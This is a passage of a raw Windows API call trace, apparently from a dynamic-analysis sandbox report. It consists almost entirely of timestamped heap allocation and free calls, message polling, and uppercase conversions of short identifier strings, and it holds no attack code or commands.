hHeap=0x2af0000) returned 1 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0214.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0214.840] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0214.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0214.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0214.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0214.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0214.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.844] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1e8 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.844] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0214.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.845] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0214.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0214.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0214.845] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0214.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854308 [0214.845] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0214.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0214.846] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0214.846] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0214.846] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0214.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0214.847] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.847] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.847] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0214.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854e48 [0214.847] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0214.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0214.848] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: 